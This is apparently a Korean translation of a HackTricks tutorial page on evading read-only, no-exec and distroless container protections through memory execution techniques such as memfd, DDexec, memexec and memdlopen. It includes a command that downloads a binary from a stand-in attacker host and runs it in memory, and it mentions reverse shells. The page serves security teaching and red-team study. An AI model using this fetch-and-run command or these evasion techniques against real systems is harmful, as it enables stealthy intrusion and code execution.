| .. | ||
| ddexec.md | ||
| README.md | ||
FS 보호 기능 우회: 읽기 전용 / 실행 불가 / Distroless
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요
HackTricks를 지원하는 다른 방법:
- 회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면 구독 요금제를 확인하세요!
- 공식 PEASS & HackTricks 굿즈를 구매하세요
- The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
- 💬 디스코드 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- 여러분의 해킹 기술을 공유하려면 HackTricks 및 HackTricks Cloud 깃허브 저장소로 PR을 제출하세요.
해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 저희가 채용 중입니다! (유창한 폴란드어 필수).
{% embed url="https://www.stmcyber.com/careers" %}
비디오
다음 비디오에서는 이 페이지에서 언급된 기술에 대해 더 자세히 설명된 내용을 찾을 수 있습니다:
- DEF CON 31 - 은밀하고 회피를 위한 Linux 메모리 조작 탐색
- DDexec-ng 및 메모리 dlopen()을 사용한 은밀한 침입 - HackTricks Track 2023
읽기 전용 / 실행 불가 시나리오
특히 컨테이너에서 읽기 전용 (ro) 파일 시스템 보호로 마운트된 리눅스 머신을 더 많이 찾을 수 있습니다. 이는 securitycontext에서 **readOnlyRootFilesystem: true**를 설정하는 것만으로 ro 파일 시스템을 사용하여 컨테이너를 실행할 수 있기 때문입니다:
apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
readOnlyRootFilesystem: true
command: ["sh", "-c", "while true; do sleep 1000; done"]
그러나 파일 시스템이 ro로 마운트되어 있더라도 **/dev/shm**은 여전히 쓰기 가능하므로 디스크에 아무것도 쓸 수 없는 것은 가짜입니다. 그러나 이 폴더는 실행 불가 보호로 마운트되므로 여기에 바이너리를 다운로드하면 실행할 수 없습니다.
{% hint style="warning" %}
적색 팀 관점에서는 시스템에 이미 없는 바이너리(백도어 또는 kubectl과 같은 열거자)를 다운로드하고 실행하는 것이 복잡해집니다.
{% endhint %}
가장 쉬운 우회: 스크립트
바이너리를 언급했지만, 인터프리터가 머신 내에 있는 한 쉘 스크립트(sh가 설치되어 있는 경우)나 파이썬 스크립트(python이 설치된 경우)와 같이 스크립트를 실행할 수 있습니다.
그러나 이것만으로는 바이너리 백도어나 실행해야 할 다른 바이너리 도구를 실행할 수 없을 수도 있습니다.
메모리 우회
파일 시스템이 실행을 허용하지 않더라도 바이너리를 실행하려면 메모리에서 실행하는 것이 가장 좋습니다. 왜냐하면 보호 기능이 적용되지 않기 때문입니다.
FD + exec 시스템 호출 우회
머신 내에 Python, Perl, 또는 Ruby와 같은 강력한 스크립트 엔진이 있는 경우, 메모리에서 실행할 바이너리를 다운로드하고, 이를 메모리 파일 디스크립터(create_memfd 시스템 호출)에 저장한 후, 이러한 보호 기능에 의해 보호되지 않을 것이므로 fd를 파일로 실행할 수 있도록 exec 시스템 호출을 호출할 수 있습니다.
이를 위해 fileless-elf-exec 프로젝트를 쉽게 사용할 수 있습니다. 이 프로젝트에 바이너리를 전달하면 바이너리를 디코딩하고 압축 해제하는 지침과 함께 지정된 언어의 스크립트를 생성하여 create_memfd 시스템 호출을 통해 만든 fd에 바이너리를 저장하고 실행하기 위한 exec 시스템 호출을 호출합니다.
{% hint style="warning" %}
PHP 또는 Node와 같은 다른 스크립팅 언어에서는 스크립트에서 원시 시스템 호출을 호출하는 기본 방법이 없기 때문에 create_memfd를 호출하여 메모리 fd를 만들어 바이너리를 저장할 수 없습니다. 따라서 /dev/shm에 파일이 있는 일반 fd를 만들어도 실행할 수 없습니다. 왜냐하면 실행 불가 보호가 적용되기 때문입니다.
{% endhint %}
DDexec / EverythingExec
DDexec / EverythingExec는 자신의 프로세스 메모리를 수정하여 **/proc/self/mem**을 덮어쓰는 기술로, 프로세스가 실행하는 어셈블리 코드를 제어하여 쉘코드를 작성하고 프로세스를 임의의 코드를 실행하도록 "변이"시킬 수 있습니다.
{% hint style="success" %} DDexec / EverythingExec를 사용하면 메모리에서 자체 쉘코드 또는 임의의 바이너리를 로드하고 실행할 수 있습니다. {% endhint %}
# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
MemExec
Memexec는 DDexec의 자연스러운 다음 단계입니다. DDexec 셸코드를 데몬화한 것으로, 다른 이진 파일을 실행하려면 DDexec을 다시 시작할 필요가 없습니다. 대신 DDexec 기술을 통해 memexec 셸코드를 실행하고 이 데몬과 통신하여 새로운 이진 파일을로드하고 실행할 수 있습니다.
memexec를 사용하여 PHP 역쉘에서 이진 파일을 실행하는 예제는 https://github.com/arget13/memexec/blob/main/a.php에서 찾을 수 있습니다.
Memdlopen
DDexec과 유사한 목적을 가진 memdlopen 기술은 메모리에 이진 파일을로드하여 나중에 실행하는 더 쉬운 방법을 제공합니다. 이를 통해 종속성이 있는 이진 파일을로드할 수도 있습니다.
Distroless Bypass
Distroless란
Distroless 컨테이너에는 특정 응용 프로그램이나 서비스를 실행하는 데 필요한 최소한의 구성 요소만 포함되어 있습니다. 라이브러리 및 런타임 종속성과 같은 것은 포함되지만 패키지 관리자, 셸 또는 시스템 유틸리티와 같은 큰 구성 요소는 제외됩니다.
Distroless 컨테이너의 목표는 불필요한 구성 요소를 제거함으로써 컨테이너의 공격 표면을 줄이고 악용될 수 있는 취약점의 수를 최소화하는 것입니다.
역쉘
Distroless 컨테이너에서는 일반 쉘을 얻기 위해 sh 또는 bash를 찾을 수 없을 수도 있습니다. 또한 ls, whoami, id와 같은 이진 파일도 찾을 수 없습니다. 이는 일반적으로 시스템에서 실행하는 모든 것입니다.
{% hint style="warning" %} 따라서 보통 하는 것처럼 역쉘을 얻거나 시스템을 열거할 수 없습니다. {% endhint %}
그러나 감염된 컨테이너가 예를 들어 플라스크 웹을 실행 중이라면 Python이 설치되어 있으므로 Python 역쉘을 얻을 수 있습니다. Node를 실행 중이라면 Node 역쉘을 얻을 수 있으며 대부분의 스크립팅 언어도 마찬가지입니다.
{% hint style="success" %} 스크립팅 언어를 사용하여 언어 기능을 활용하여 시스템을 열거할 수 있습니다. {% endhint %}
read-only/no-exec 보호 기능이 없는 경우에는 역쉘을 악용하여 파일 시스템에 자신의 이진 파일을 작성하고 실행할 수 있습니다.
{% hint style="success" %} 그러나 이러한 종류의 컨테이너에서는 일반적으로 이러한 보호 기능이 존재하지만 이를 우회하기 위해 이전 메모리 실행 기술을 사용할 수 있습니다. {% endhint %}
RCE 취약점을 악용하여 스크립팅 언어 역쉘을 얻고 메모리에서 이진 파일을 실행하는 방법에 대한 예제는 https://github.com/carlospolop/DistrolessRCE에서 찾을 수 있습니다.